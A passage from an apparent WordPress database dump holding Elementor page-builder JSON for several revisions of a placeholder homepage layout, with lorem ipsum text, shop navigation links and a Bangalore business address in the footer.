Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8284,1458,'_elementor_page_assets','a:0:{}'),(8286,1459,'_elementor_edit_mode','builder'),(8287,1459,'_elementor_template_type','wp-page'),(8288,1459,'_elementor_version','3.7.7'),(8289,1459,'_wp_page_template','elementor_canvas'),(8290,1459,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8291,1459,'_elementor_page_assets','a:0:{}'),(8293,1460,'_elementor_edit_mode','builder'),(8294,1460,'_elementor_template_type','wp-page'),(8295,1460,'_elementor_version','3.7.7'),(8296,1460,'_wp_page_template','elementor_canvas'),(8297,1460,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b